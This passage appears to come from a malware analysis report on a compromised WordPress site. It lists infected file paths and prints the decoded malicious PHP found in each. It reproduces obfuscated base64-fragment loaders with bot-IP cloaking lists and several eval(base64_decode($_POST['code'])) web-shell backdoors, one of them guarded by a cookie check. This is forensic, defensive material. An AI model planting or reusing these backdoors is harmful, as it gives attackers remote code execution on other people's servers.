'2luY2x1ZGVfZ' . 'Gly', 'c2F' . 'mZV9tb2R' . 'lX2V4ZWN' . 'fZG' . 'ly', 'Z' . 'GlzYW' . 'J' . 's' . 'ZV' . '9m' . 'dW5' .
'jdG' . 'lvbnM' . '=', 'YWxs' . 'b3dfd' . 'XJ' . 'sX2ZvcGVu', 'b' . 'WF4X2V4Z' . 'W' . 'N1dGlvbl90aW1l', '' .
'b3V0cH' . 'V' . '0X2J1ZmZlcm' . 'luZw==', '' . 'bW' . 'Vt' . 'b3J5X2xpbW' . 'l' . '0', '' . 'MTZ' . 'N', 'ZXJyb3J' .
'fbG9' . 'n', 'bG9nX2Vy' . 'cm9y' . 'cw==', 'Z' . 'mlsZV9' . '1' . 'c' . 'GxvYW' . 'Rz', 'Y' . 'Wxsb3dfdXJ' . 's' .
'X2ZvcGVu', 'bWF' . '4' . 'X2V4ZWN1d' . 'Glv' . 'bl90aW1l', 'b3' . 'V0c' . 'HV' . '0X2J1ZmZ' . 'lcmluZw==', '' .
'b' . 'W' . 'Vtb' . '3' . 'J5X' . '2x' . 'pbWl0', 'MTZN', 'ZXJ' . 'yb3J' . 'fbG9n', 'bG9nX2Vy' . 'cm9ycw=' . '=',
'ZmlsZ' . 'V9' . '1c' . 'G' . 'xvY' . 'WRz', 'Y' . 'Wxsb3d' . 'f' . 'dXJsX2' . 'ZvcGVu', 'T' . 'W9' . '6aWxs' . 'YS80Lj' .
'A' . 'g' . 'K' . 'GN' . 'v' . 'b' . 'XBhdG' . 'l' . 'ib' . 'GU7' . 'I' . 'E1TS' . 'UUgOC' . '4wOyB' . 'X' . 'aW5kb3d' .
'zIE5UIDY' . 'uM' . 'C' . 'k=', 'c2FmZV9tb2' . 'R' . 'l', '' . 'b3B' . 'lbl9iYXNlZGly', 'a' . 'HR0cDovLw==', '', '' . 'Iy8'
. 'j', 'Lw' . '==', '', '', 'Lw==', 'L' . 'w' . '==', 'QWN' . 'jZXB' . '0LU' . 'xhbmd1Y' . 'Wd' . 'l' . 'OiBlbi11c' . 'ywgZ' .
'W' . '47cT0wLj' . 'UwDQo=', 'Q29ubmVjdGlvb' . 'jogQ2x' . 'v' . 'c2UNCg0' . 'K', '' . 'D' . 'Q' . 'oNC' . 'g==', 'C'
. 'g==', 'PGJyIC8+', '', '' . 'L0' . 'xvY2F0a' . 'W9uXDov', '' . 'TG9jYXRpb2' . '4' . '6IA==', 'DQ=' . '=', 'DQ' .
'oNCg==', '', 'JiM3NiYjMTExJiM5' . 'OSY' . 'j' . 'O' . 'Tcm' . 'IzE' . 'xNiYjMT' . 'A' . '1JiMxMTEm' . 'Iz' . 'E' . 'xM'
. 'C' . 'YjNT' . 'g' . '=', 'TG9' . 'jYXRpb2' . '46', 'R' . 'V' . 'JST1I=', 'NjZc' . 'LjI0O' . 'VwuWz' . 'YtOV' . '1' .
'bMC05X' . 'V' . 'wuWzAtOV0r', 'NzJcL' . 'jE0XC5bMS0yXVswL' . 'TldW' . 'z' . 'AtOV1cLlswLTldKw==',
'NzRcLj' . 'E' . 'yNVw' . 'uWzAtOV0rXC5' . 'bMC05' . 'X' . 'Ss=', 'Nj' . 'VcLjVb' . 'Mi01XVw' . 'uW' . 'zA' .
'tOV0rXC5bMC05X' . 'Ss=', 'Nz' . 'Rc' . 'LjZcLlswLTldK1wu' . 'W' . 'zAtO' . 'V0r', 'N' . 'j' . 'dcLj' . 'E5NVw' .
'uW' . 'zAt' . 'OV0rX' . 'C5bMC05XSs=', '' . 'NzJ' . 'cLjMw' . 'XC5' . 'bM' . 'C' . '05XStc' . 'Ll' . 's' . 'w' . 'LT' .
'ldKw=' . '=', 'MzhcL' . 'lswLTldK1wuWzAtO' . 'V0' . 'rXC5bMC' . '05XSs' . '=', 'M' . 'TI0XC' . '4x' . 'MTV' . 'cL'
. 'jZc' . 'L' . 'lsw' . 'LTl' . 'dKw==', '' . 'OTNcLjE' . '3Ml' . 'w' . 'uOTRcLjIyNw' . '=' . '=', 'Mj' . 'Ey' . 'XC4xM' .
'DBcLj' . 'I' . '1M' . 'FwuMj' . 'E4', 'NzFcL' . 'jE2N' . 'V' . 'wu' . 'MjI' . 'zXC4x' . 'MzQ=', 'MjA5XC4' . '5X' . 'C' .
'4yMzlcLjEw' . 'MQ' . '=' . '=', 'Njdc' . 'LjIxN1wuMTYwX' . 'C5bMC05' . 'X' . 'Ss=', 'NzBcLjk' . 'x' . 'XC4' . 'xO' .
'DBcLj' . 'I1', '' . 'N' . 'jVcL' . 'jkzXC4' . '2Mlwu' . 'M' . 'jQy', 'NzRcLjE5M1wu' . 'M' . 'jQ2X' . 'C4xM' . 'j' . 'k=',
'Mj' . 'EzX' . 'C4' . 'x' . 'NDRcLjE1X' . 'C4zOA' . '==', '' . 'MTk1X' . 'C45' . 'Ml' . 'w' . 'uM' . 'jI' . '5XC4' . 'y', 'N' .
'zBcLjU' . 'wXC' . '4xODlcLjE5MQ==', 'MjE' . '4XC' . '4yOFwuODhcLjk5', 'MTY1XC4x' . 'N' . 'j' . 'Bc' . 'Lj' . 'JcL'
. 'jIw', 'OD' . 'lcLjEyMlwuM' . 'jI0X' . 'C4' . 'yM' . 'zA=', 'Nj' . 'ZcL' . 'jIzMFw' . 'uMTc' . '1' . 'XC4' . 'xM' . 'jQ=',
'Mj' . 'E4XC' . '4xO' . 'F' . 'wuM' . 'Tc' . '0XC4yNw=' . '=', 'NjV' . 'cLjMzX' . 'C44N1wu' . 'OTQ=', 'NjdcLjIx' .
'M' . 'FwuMTExXC4y' . 'ND' . 'E=', 'ODFcLjEzNVwu' . 'MTc1XC43' . 'MA==', 'Nj' . 'R' . 'cLjY5XC' . '4' . 'zNFwu'
. 'MTM0', '' . 'ODlcLjE' . '0OVwu' . 'MjUzXC4' . 'x' . 'Njk=', 'NjRcL' . 'j' . 'Iz' . 'M1' . 'w' . 'uMVs2' . 'LThdW' .
'zEtOV' . '1cLlswLTldK' . 'w==', 'N' . 'j' . 'RcLjI' . 'zM' . '1' . 'wuM' . 'TlbMC0xXV' . 'w' . 'uWz' . 'AtOV0r',
'MjA5' . 'X' . 'C4' . 'x' . 'O' . 'D' . 'VcL' . 'jE' . 'wOFwu' . 'WzAtOV' . '0' . 'r', 'MjA' . '5XC4xODVcLjI1M1' .
'wuWzAtO' . 'V0r', 'M' . 'jA5' . 'X' . 'C44' . 'NVwuM' . 'j' . 'M4' . 'XC5bMC05X' . 'Ss=', 'MjE2XC4y' . 'M' . 'zlcL'
. 'jMzX' . 'C45W' . 'zYtOV0=', '' . 'Mj' . 'E2X' . 'C4yMzlcLjM3XC45WzgtOV0=', '' . 'Mj' . 'E2XC4' . 'yMz' .
'lcLjM5' . 'XC4' . '5Wz' . 'gtOV0=', 'MjE' . '2' . 'XC4' . 'y' . 'M' . 'z' . 'l' . 'cLj' . 'QxXC45WzYtOV' . '0' . '=', 'MjE2'
. 'XC4yM' . 'zl' . 'cLjQ' . '1XC40', 'M' . 'jE2XC' . '4' . 'yMz' . 'lcL' . 'jQ' . '2XC5bMC05XS' . 's' . '=',
'MjE2XC4yMzlcLjUxXC45WzYtOV0' . '=', 'MjE2X' . 'C4' . 'y' . 'M' . 'zlcLj' . 'UzXC45W' . 'zgt' . 'OV0=', 'MjE2' .
'XC4' . 'yMzlcL' . 'jU3XC' . '45Wz' . 'YtOV0=', 'MjE2' . 'XC4yMzlcL' . 'jU5X' . 'C45W' . 'zg' . 'tOV0' . '=', 'MjE2'
@ 8
2.2.4 Location: wp-includes/js/tinymce/plugins/fullscreen-randomfunctions.php
@ 9
Decoded:
<?php if (!function_exists('ll')) {
function ll($i) {
$a = Array('', 'Xw==', 'Xw' . '==', '' . 'X' . 'A==', '' . 'Lw==', '' . 'Ly8=', 'L' . 'g==', '' . 'Ly' . '8=', 'TW96' .
'aWx' . 'sYS80' . 'L' . 'j' . 'AgKG' . 'NvbXBh' . 'dG' . 'libGU7IE' . '1TSUUg' . 'OC4w' . 'OyBX' . 'aW5' . 'kb3' . 'd' .
'zIE5UIDYuM' . 'Ck=', 'T' . 'W' . '9' . '6aWxsY' . 'S' . '81' . 'LjAgKF' . 'dpb' . 'mRvd3M7IFU7IFdpbm' . 'R' .
'vd3MgTlQgNS4xO' . 'yBlbi1' . 'VUz' . 'sgcnY' . '6MS' . '45' . 'LjAuMSkgR2' . 'Vja' . '28' . 'v' . 'MjAwOD' . 'A5'
. 'M' . 'jIxNSB' . 'GaXJlZ' . 'm94L' . 'zMuM' . 'C4x', 'TW96aW' . 'xsYS81LjAgK' . 'Fdp' . 'bmRvd3M7IFU7' .
'IFd' . 'pb' . 'mR' . 'vd3MgTlQ' . 'g' . 'NS4xOy' . 'Blbi1VUyk' . 'gR2V' . 'ja28' . 'vMjAwM' . 'z' . 'A' .
'1MDQgTW96aWxs' . 'Y' . 'SB' . 'G' . 'a' . 'X' . 'JlYmly' . 'Z' . 'C8wLjY=', 'TW96aW' . 'xsY' . 'S' . '81' . 'Lj' .
'AgKFdp' . 'bmRv' . 'd3M' . '7IFU7' . 'IFdpbmRv' . 'd3Mg' . 'Tl' . 'QgN' . 'S4xOyBlbi1V' . 'Uzsg' . 'c' .
'nY6MS45Lj' . 'IuMTAp' . 'IEdlY2tvL' . 'zI' . 'wMTAwO' . 'TE0I' . 'E' . 'Zpcm' . 'Vmb3' . 'gvMy42' . 'LjEw', 'c2' .
'FmZV9t' . 'b2Rl', 'b3Blb' . 'l9iYXNlZGly', 'aHR0cDo' . 'vLw=' . '=', '', '' . 'Iy' . '8' . 'j', 'Lw' . '==', '', '', 'Lw==', '' .
'L' . 'w==', '' . 'QWNj' . 'ZXB0' . 'L' . 'U' . 'xhbmd1YWdlOiBl' . 'b' . 'i11cywg' . 'ZW47c' . 'T0' . 'wL' . 'jU' .
'wDQo=', 'Q' . '29ubm' . 'Vjd' . 'G' . 'l' . 'vbjo' . 'g' . 'Q2x' . 'v' . 'c2U' . 'NCg0K', 'DQoNCg' . '=' . '=', 'Cg==',
'PGJyIC' . '8+', '', 'L0xvY2F0aW' . '9uXDov', 'TG9j' . 'YXRp' . 'b246IA==', 'DQ==', 'D' . 'Qo' . 'N' . 'C' . 'g' . '==',
'', 'Ji' . 'M' . '3NiYjMTE' . 'xJiM' . '5OS' . 'Y' . 'jO' . 'TcmIzEx' . 'NiYjM' . 'T' . 'A1Ji' . 'MxM' . 'TEmIzEx' .
'MCYjNTg=', '' . 'TG9jYXRpb246', 'Y' . 'Wx' . 's' . 'b3dfd' . 'X' . 'JsX2ZvcGVu', 'MQ' . '==', 'PG' .
'g1IHN0eWxlPSdj' . 'b2xv' . 'cjptYXJ' . 'vb24n' . 'PkNh' . 'bid0' . 'IGR' . 'vd' . '2' . '5sb2FkIA==', 'I' . 'C0g' . 'RV'
. 'hJVDs8L2g1Pg==', '', '', '', 'Cg==', '' . 'c' . 'g' . '=' . '=', '', 'c' . 'G' . 'lwZQ==', 'd' . 'w' . '==', '', 'c2FmZV9tb2R' .
'l', '' . 'b3Blbl9i' . 'YX' . 'Nl' . 'ZGl' . 'y', 'c2FmZV9tb2R' . 'lX2luY2x' . '1ZGVfZGly', 'c2' . 'F' . 'mZV9tb2RlX2V4' .
'ZWNfZ' . 'Gly', 'ZGlzYWJs' . 'ZV9' . 'mdW5jdG' . 'lv' . 'bnM' . '=', 'YW' . 'xsb3' . 'dfdX' . 'JsX2ZvcGVu',
'bWF4X2V4ZWN1dGlvb' . 'l90' . 'aW1' . 'l', 'b3V0cH' . 'V0' . 'X2J' . '1ZmZlcml' . 'uZw==', 'b' . 'WV' . 'tb3J5X'
. '2xpbW' . 'l0', 'Mj' . 'U2T' . 'Q==', '' . 'ZXJy' . 'b3' . 'JfbG9n', 'bG9nX' . '2Vycm9ycw=' . '=', 'ZmlsZV91cGxvY'
. 'W' . 'Rz', 'YW' . 'x' . 's' . 'b3' . 'd' . 'fdX' . 'JsX' . '2Zvc' . 'GVu', 'bWF' . '4X2V4' . 'Z' . 'WN1dGlvb' . 'l90aW1l',
'b3V0cHV0X2J1Z' . 'mZlcmlu' . 'Zw==', 'bWVtb3J5X2xpbWl' . '0', 'MjU2TQ=' . '=', 'Z' . 'XJyb3JfbG' . '9n',
'bG9nX2Vycm9yc' . 'w==', 'Z' . 'mlsZV' . '91' . 'cGxvYWR' . 'z', 'YWxsb3df' . 'dX' . 'J' . 'sX2Zvc' . 'GVu', 'XA' .
'==', '' . 'Lw==', 'RE9DVU1FTl' . 'RfUk9' . 'P' . 'VA==', '' . 'XA==', 'Lw==', 'U' . '0' . 'N' . 'SSV' . 'BUX0' . 'ZJTEV' .
'O' . 'QU' . '1F', 'UEhQX1N' . 'FTE' . 'Y=', 'XA==', '' . 'Lw==', '' . 'KF' . 'wu' . 'cGguKiR8XC5o' . 'dG0u' .
'KiR8XC5' . 'za' . 'H' . 'Rt' . 'LiokfF' . 'w' . 'uY' . 'XNwLi' . 'okfFwuan' . 'NwJH' . 'xcLm' . 'podG0k' . 'fFwuY2' .
'ZtJHxc' . 'L' . 'mN0c' . 'C' . 'R' . '8XC50cGwkKQ' . '=' . '=', 'LzxhZD4uKjxc' . 'L' . '2FkPi9zaQ==', 'Lz' .
'xhZHM+Lio8XC' . '9hZH' . 'M+L3Np', 'Lzxi' . 'YjE' . '+Lio8' . 'YmIyP' . 'i9' . 'z' . 'aQ==', '' . 'L' . 'z' . 'xiMT' .
'4uKj' . 'x' . 'c' . 'L2I' . 'x' . 'Pi9zaQ' . '=' . '=', '' . 'Lzxi' . 'YjE+' . 'PGJiMT4vc2k' . '=', 'LzxiYjI+PGJiMj4vc2k=', 'L' .
'zxhZD' . '4uKjxcL2' . 'Fk' . 'P' . 'i' . '9z', '' . 'Lzxl' . 'bXM+' . 'L' . 'io8X' . 'C9lbX' . 'M+' . 'L3M' . '=', 'LzxibG' .
'9jaz4uKjxcL2Js' . 'b2Nr' . 'Pi9' . 'z', 'L' . 'zxkaW' . 'c+Lio8XC9kaWc+L' . '3M=', 'LzxjZW50' . 'cj' . '4u' .
'KjxcL2Nlb' . 'nRyP' . 'i9z', 'LzxjaXR' . 'zPi4qPFwv' . 'Y2l0c' . 'z4v' . 'cw==', 'Lzx0Y' . 'nQ+' . 'Lio8XC90' . 'YnQ' .
'+L3M=', '' . 'L' . 'z' . 'w' . 'oc' . '3Bhbnxmb250fGRpd' . 'ikgc' . '3R' . '5bGU9Lioo' . 'aG' . 'Vp' . 'Z2h0fHdp' .
'ZH' . 'RoKVxz' . 'KjpccypbMC0yXXs' . 'x' . 'fVxzKihwdHxwe' . 'CkuKihv' . 'dmV' . 'yZmxvd3x2aXNpYmlsaX' .
'R5KVxzKjp' . 'c' . 'cyooYX' . 'V0b3x' . 'oa' . 'WRkZW4p' . 'Lio+Lio8YSBocmVmPS' . '4qP' . 'FwvYT4uKj' .
'xcLyhzcGFu' . 'fGZvbnR' . '8' . 'Z' . 'Gl' . '2KT' . '4vVX' . 'Np', 'Lzwoc3Bhbnx' . 'm' . 'b250fGRpd' .
'ikgc3R5bGU9' . 'Lioob' . '3Z' . 'lcm' . 'Zsb3d8dm' . 'lzaWJpbG' . 'l' . '0' . 'eSlccyo6X' . 'H' . 'MqKGF1dG9' .
@ 10
2.2.5 Location: wp-content/plugins/aegis.php
Decoded:
eval(base64_decode($_POST["code"]));
Decoded:
eval(base64_decode($_POST["code"]));
@ 11
2.2.7 Location: wp-content/blogs.dir/swift.php
Decoded:
eval(base64_decode($_POST["code"]));
Decoded:
eval(base64_decode($_POST["code"]));
@ 12
2.2.9 Location: wp-includes/ID3/x11r3.php
Decoded:
<?php if (md5($_COOKIE['key']) == $key) {
eval(base64_decode($_POST["code"]));
}
Decoded:
<?php if (md5($_COOKIE['key']) == $key) {
eval(base64_decode($_POST["code"]));
}
@ 13
2.2.11 Location: wp-content/backup-db/ieupdate.php
@ 14
Decoded:
<?php if (!function_exists('ll')) {
function ll($i) {
$a = Array('', 'Xw==', 'Xw' . '==', '' . 'X' . 'A==', '' . 'Lw==', ''
. 'Ly8=', 'L' . 'g==', '' . 'Ly' . '8=', 'TW96' . 'aWx' . 'sYS80' . 'L' . 'j'
. 'AgKG' . 'NvbXBh' . 'dG' . 'libGU7IE' . '1TSUUg' . 'OC4w' . 'OyBX' . 'aW5'
. 'kb3' . 'd' . 'zIE5UIDYuM' . 'Ck=', 'T' . 'W' . '9' . '6aWxsY' . 'S' . '81'
. 'LjAgKF' . 'dpb' . 'mRvd3M7IFU7IFdpbm' . 'R' . 'vd3MgTlQgNS4xO' . 'yBlbi1'
. 'VUz' . 'sgcnY' . '6MS' . '45' . 'LjAuMSkgR2' . 'Vja' . '28' . 'v' .
'MjAwOD' . 'A5' . 'M' . 'jIxNSB' . 'GaXJlZ' . 'm94L' . 'zMuM' . 'C4x',
'TW96aW' . 'xsYS81LjAgK' . 'Fdp' . 'bmRvd3M7IFU7' . 'IFd' . 'pb' . 'mR' .
'vd3MgTlQ' . 'g' . 'NS4xOy' . 'Blbi1VUyk' . 'gR2V' . 'ja28' . 'vMjAwM' . 'z'
. 'A' . '1MDQgTW96aWxs' . 'Y' . 'SB' . 'G' . 'a' . 'X' . 'JlYmly' . 'Z' .
'C8wLjY=', 'TW96aW' . 'xsY' . 'S' . '81' . 'Lj' . 'AgKFdp' . 'bmRv' . 'd3M' .
'7IFU7' . 'IFdpbmRv' . 'd3Mg' . 'Tl' . 'QgN' . 'S4xOyBlbi1V' . 'Uzsg' . 'c' .
'nY6MS45Lj' . 'IuMTAp' . 'IEdlY2tvL' . 'zI' . 'wMTAwO' . 'TE0I' . 'E' .
'Zpcm' . 'Vmb3' . 'gvMy42' . 'LjEw', 'c2' . 'FmZV9t' . 'b2Rl', 'b3Blb' .
'l9iYXNlZGly', 'aHR0cDo' . 'vLw=' . '=', '', '' . 'Iy' . '8' . 'j', 'Lw' .
'==', '', '', 'Lw==', '' . 'L' . 'w==', '' . 'QWNj' . 'ZXB0' . 'L' . 'U' .
'xhbmd1YWdlOiBl' . 'b' . 'i11cywg' . 'ZW47c' . 'T0' . 'wL' . 'jU' . 'wDQo=',
'Q' . '29ubm' . 'Vjd' . 'G' . 'l' . 'vbjo' . 'g' . 'Q2x' . 'v' . 'c2U' .
'NCg0K', 'DQoNCg' . '=' . '=', 'Cg==', 'PGJyIC' . '8+', '', 'L0xvY2F0aW' .
'9uXDov', 'TG9j' . 'YXRp' . 'b246IA==', 'DQ==', 'D' . 'Qo' . 'N' . 'C' . 'g'
. '==', '', 'Ji' . 'M' . '3NiYjMTE' . 'xJiM' . '5OS' . 'Y' . 'jO' . 'TcmIzEx'
. 'NiYjM' . 'T' . 'A1Ji' . 'MxM' . 'TEmIzEx' . 'MCYjNTg=', '' .
'TG9jYXRpb246', 'Y' . 'Wx' . 's' . 'b3dfd' . 'X' . 'JsX2ZvcGVu', 'MQ' . '==',
'PG' . 'g1IHN0eWxlPSdj' . 'b2xv' . 'cjptYXJ' . 'vb24n' . 'PkNh' . 'bid0' .
'IGR' . 'vd' . '2' . '5sb2FkIA==', 'I' . 'C0g' . 'RV' . 'hJVDs8L2g1Pg==', '',
'', '', 'Cg==', '' . 'c' . 'g' . '=' . '=', '', 'c' . 'G' . 'lwZQ==', 'd' .
'w' . '==', '', 'c2FmZV9tb2R' . 'l', '' . 'b3Blbl9i' . 'YX' . 'Nl' . 'ZGl' .
'y', 'c2FmZV9tb2R' . 'lX2luY2x' . '1ZGVfZGly', 'c2' . 'F' . 'mZV9tb2RlX2V4' .
'ZWNfZ' . 'Gly', 'ZGlzYWJs' . 'ZV9' . 'mdW5jdG' . 'lv' . 'bnM' . '=', 'YW' .
'xsb3' . 'dfdX' . 'JsX2ZvcGVu', 'bWF4X2V4ZWN1dGlvb' . 'l90' . 'aW1' . 'l',
'b3V0cH' . 'V0' . 'X2J' . '1ZmZlcml' . 'uZw==', 'b' . 'WV' . 'tb3J5X' .
'2xpbW' . 'l0', 'Mj' . 'U2T' . 'Q==', '' . 'ZXJy' . 'b3' . 'JfbG9n', 'bG9nX'
. '2Vycm9ycw=' . '=', 'ZmlsZV91cGxvY' . 'W' . 'Rz', 'YW' . 'x' . 's' . 'b3' .
'd' . 'fdX' . 'JsX' . '2Zvc' . 'GVu', 'bWF' . '4X2V4' . 'Z' . 'WN1dGlvb' .
'l90aW1l', 'b3V0cHV0X2J1Z' . 'mZlcmlu' . 'Zw==', 'bWVtb3J5X2xpbWl' . '0',
'MjU2TQ=' . '=', 'Z' . 'XJyb3JfbG' . '9n', 'bG9nX2Vycm9yc' . 'w==', 'Z' .
'mlsZV' . '91' . 'cGxvYWR' . 'z', 'YWxsb3df' . 'dX' . 'J' . 'sX2Zvc' . 'GVu',
'XA' . '==', '' . 'Lw==', 'RE9DVU1FTl' . 'RfUk9' . 'P' . 'VA==', '' . 'XA==',
'Lw==', 'U' . '0' . 'N' . 'SSV' . 'BUX0' . 'ZJTEV' . 'O' . 'QU' . '1F',
'UEhQX1N' . 'FTE' . 'Y=', 'XA==', '' . 'Lw==', '' . 'KF' . 'wu' .
'cGguKiR8XC5o' . 'dG0u' . 'KiR8XC5' . 'za' . 'H' . 'Rt' . 'LiokfF' . 'w' .
'uY' . 'XNwLi' . 'okfFwuan' . 'NwJH' . 'xcLm' . 'podG0k' . 'fFwuY2' .
'ZtJHxc' . 'L' . 'mN0c' . 'C' . 'R' . '8XC50cGwkKQ' . '=' . '=',
'LzxhZD4uKjxc' . 'L' . '2FkPi9zaQ==', 'Lz' . 'xhZHM+Lio8XC' . '9hZH' .
'M+L3Np', 'Lzxi' . 'YjE' . '+Lio8' . 'YmIyP' . 'i9' . 'z' . 'aQ==', '' . 'L'
. 'z' . 'xiMT' . '4uKj' . 'x' . 'c' . 'L2I' . 'x' . 'Pi9zaQ' . '=' . '=', ''
. 'Lzxi' . 'YjE+' . 'PGJiMT4vc2k' . '=', 'LzxiYjI+PGJiMj4vc2k=', 'L' .
'zxhZD' . '4uKjxcL2' . 'Fk' . 'P' . 'i' . '9z', '' . 'Lzxl' . 'bXM+' . 'L' .
'io8X' . 'C9lbX' . 'M+' . 'L3M' . '=', 'LzxibG' . '9jaz4uKjxcL2Js' . 'b2Nr' .
'Pi9' . 'z', 'L' . 'zxkaW' . 'c+Lio8XC9kaWc+L' . '3M=', 'LzxjZW50' . 'cj' .
'4u' . 'KjxcL2Nlb' . 'nRyP' . 'i9z', 'LzxjaXR' . 'zPi4qPFwv' . 'Y2l0c' .
'z4v' . 'cw==', 'Lzx0Y' . 'nQ+' . 'Lio8XC90' . 'YnQ' . '+L3M=', '' . 'L' .
'z' . 'w' . 'oc' . '3Bhbnxmb250fGRpd' . 'ikgc' . '3R' . '5bGU9Lioo' . 'aG' .
'Vp' . 'Z2h0fHdp' . 'ZH' . 'RoKVxz' . 'KjpccypbMC0yXXs' . 'x' .
'fVxzKihwdHxwe' . 'CkuKihv' . 'dmV' . 'yZmxvd3x2aXNpYmlsaX' . 'R5KVxzKjp' .
@ 15
2.2.12 Location: wp-includes/Text/Diff/Renderer/tabs.php
@ 16
Decoded:
<?php if (!function_exists('OU')) {
function OU($i) {
$a = Array('', 'Xw=' . '=', 'Xw==', 'XA' . '==', 'Lw=' . '=', 'Ly8=',
'Lg==', '' . 'L' . 'y8=', '' . 'TW96a' . 'WxsYS80L' . 'jA' . 'gK' . 'GNv' .
'bXBhdGli' . 'bGU7IE1' . 'TSU' . 'U' . 'gO' . 'C4' . 'wOy' . 'BXaW5' .
'kb3dzIE' . '5UIDYuMCk=', 'TW96aW' . 'xsYS81' . 'LjAgK' . 'Fdpb' . 'mRvd3' .
'M7IFU7IFdpbmRv' . 'd3' . 'MgTl' . 'Q' . 'gNS4xOy' . 'Blbi1VUzs' . 'gcnY6MS'
. '45LjAuMSkgR' . '2V' . 'ja28v' . 'MjAwODA5M' . 'j' . 'IxN' . 'SBGaXJ' .
'lZm9' . '4Lz' . 'Mu' . 'MC4x', 'T' . 'W' . '96a' . 'WxsYS81LjAg' . 'KFdpbm'
. 'R' . 'vd' . '3M7IF' . 'U7IFdpb' . 'mRvd3Mg' . 'Tl' . 'Q' . 'gNS4xO' .
'yBlbi1VU' . 'ykgR' . '2Vja2' . '8vMjAw' . 'MzA1MDQgTW96aWxsYS' . 'BGaXJlYml'
. 'yZC8wLjY' . '=', 'TW' . '96aWxsYS' . '81LjA' . 'g' . 'KF' . 'dpbmR' .
'vd3' . 'M7' . 'I' . 'FU7IF' . 'dpbmR' . 'vd3M' . 'gT' . 'lQg' . 'NS4xO' .
'yBlb' . 'i1VUz' . 'sgcnY6' . 'MS45' . 'LjIuM' . 'T' .
'ApIEdlY2tvLzIwMTAwOTE0IE' . 'Z' . 'pcmVmb3gvM' . 'y42L' . 'jEw', 'c2FmZV' .
'9tb2Rl', 'b' . '3' . 'Blbl9i' . 'YXNlZGl' . 'y', 'aHR0c' . 'DovL' . 'w==',
'', 'Iy8' . 'j', 'L' . 'w=' . '=', '', '', 'Lw==', 'Lw==', 'QWN' . 'jZ' .
'XB0LUxhbm' . 'd1Y' . 'W' . 'dlOi' . 'Blb' . 'i1' . '1cywgZW47' .
'cT0wLjUwDQ' . 'o' . '=', 'Q29ubmVjdGlv' . 'b' . 'jo' . 'gQ2xvc2UNC' . 'g0' .
'K', 'DQoN' . 'Cg' . '==', 'C' . 'g==', '' . 'PGJyIC8' . '+', '', '' . 'L0x'
. 'vY2F0aW9uXD' . 'o' . 'v', '' . 'TG9j' . 'YXRpb246IA==', '' . 'DQ' . '==',
'' . 'D' . 'Q' . 'oN' . 'Cg' . '==', '', 'Ji' . 'M' . '3NiY' . 'j' . 'MTE' .
'x' . 'JiM5O' . 'SY' . 'j' . 'OT' . 'cmIzE' . 'x' . 'N' . 'iYjM' . 'TA1J' .
'iMxMT' . 'EmIzEx' . 'MCYj' . 'NT' . 'g=', '' . 'TG9jYXRpb246', 'YWxsb3d' .
'fd' . 'XJ' . 's' . 'X2ZvcGVu', 'MQ==', 'PGg1IH' . 'N0e' . 'Wx' . 'lP' .
'Sdjb2' . 'xvcjpt' . 'YX' . 'Jvb24n' . 'Pk' . 'Nhbid0' . 'IGR' . 'vd25sb' .
'2FkIA==', 'I' . 'C0' . 'gRVhJVDs8L2g1' . 'Pg==', '', '', '', 'Cg==', 'cg==',
'', 'cGlw' . 'ZQ==', 'd' . 'w=' . '=', '', 'c2FmZV9' . 't' . 'b2' . 'Rl',
'b3' . 'Blbl9iYXNlZGl' . 'y', 'c2FmZV9tb2Rl' . 'X2luY2x1ZGVfZ' . 'Gly',
'c2FmZV9tb2RlX2V4ZW' . 'NfZGl' . 'y', 'Z' . 'GlzYWJsZV9m' . 'dW' . '5j' .
'dGlvbnM=', 'YWx' . 'sb3dfd' . 'XJsX2ZvcGVu', 'bWF4X' . '2V4Z' . 'WN1dGlvbl9'
. '0a' . 'W1l', 'b3V0cHV0' . 'X2J' . '1Z' . 'mZlcmluZw=' . '=', '' . 'bWV' .
'tb3J5X2' . 'xpbWl0', 'MjU2TQ==', 'ZX' . 'Jyb' . '3' . 'Jf' . 'bG9n',
'bG9nX2Vycm9ycw=' . '=', '' . 'Zmls' . 'Z' . 'V9' . '1cGxv' . 'YWRz', 'YW' .
'x' . 'sb' . '3dfdXJsX' . '2Zv' . 'c' . 'GVu', 'bWF4X2' . 'V4ZWN1dG' .
'lvbl90aW1l', 'b' . '3' . 'V0' . 'cHV0X2J1ZmZlcmluZw==', 'bW' . 'Vtb3J5X2' .
'xpbWl' . '0', 'MjU2TQ' . '==', 'ZXJyb3J' . 'fbG9' . 'n', '' . 'bG9' .
'nX2Vyc' . 'm9ycw==', '' . 'Zml' . 'sZV91cGxvYWRz', 'YW' . 'xs' . 'b' .
'3dfdXJs' . 'X2' . 'ZvcGVu', 'XA==', '' . 'Lw==', 'RE9D' . 'VU1' . 'F' .
'TlRfUk9PVA==', '' . 'XA==', 'L' . 'w==', 'U' . '0NSSV' . 'BU' . 'X0ZJT' .
'EVOQU1F', 'UEhQX' . '1NFT' . 'EY' . '=', 'XA' . '==', 'Lw' . '==', 'KFwuc' .
'GguKiR8' . 'XC5odG0uKiR8XC' . '5' . 'zaHR' . 'tL' . 'iokfF' . 'wuYX' . 'N' .
'wLiokfFwuan' . 'N' . 'wJHxc' . 'L' . 'mpod' . 'G0kfFwuY' .
'2ZtJHxcLmN0cCR8X' . 'C5' . '0c' . 'GwkK' . 'Q==', '' . 'LzxhZ' . 'D' .
'4uKjxc' . 'L2F' . 'k' . 'P' . 'i9' . 'zaQ==', 'LzxhZHM+Lio8XC9h' .
'ZHM+L3Np', 'LzxiY' . 'jE+Lio8' . 'YmIy' . 'Pi9z' . 'a' . 'Q=' . '=', '' .
'Lzxi' . 'MT4uKjxcL2Ix' . 'Pi9z' . 'aQ==', 'LzxiYj' . 'E+PGJi' . 'MT4' . 'vc'
. '2k' . '=', 'Lzxi' . 'YjI+P' . 'GJ' . 'i' . 'Mj4vc2k=', '' . 'Lzx' . 'h' .
'Z' . 'D4uKjx' . 'cL' . '2FkPi9' . 'z', 'Lzx' . 'lbXM' . '+Lio8X' . 'C9' .
'lbXM+L3M=', 'Lzxi' . 'bG9' . 'j' . 'az4uK' . 'jxcL2Jsb2Nr' . 'P' . 'i9' .
'z', '' . 'LzxkaW' . 'c+Lio8XC9k' . 'a' . 'W' . 'c+' . 'L' . '3M' . '=',
'LzxjZW50c' . 'j4u' . 'Kjx' . 'cL2N' . 'lbnRy' . 'Pi9' . 'z', '' . 'LzxjaX' .
'Rz' . 'P' . 'i' . '4q' . 'PFwv' . 'Y2l0' . 'cz4vc' . 'w==', 'Lzx0' .
'YnQ+Lio8X' . 'C90Yn' . 'Q' . '+L3M=', '' . 'Lz' . 'woc3B' . 'hbnxmb250fGR' .
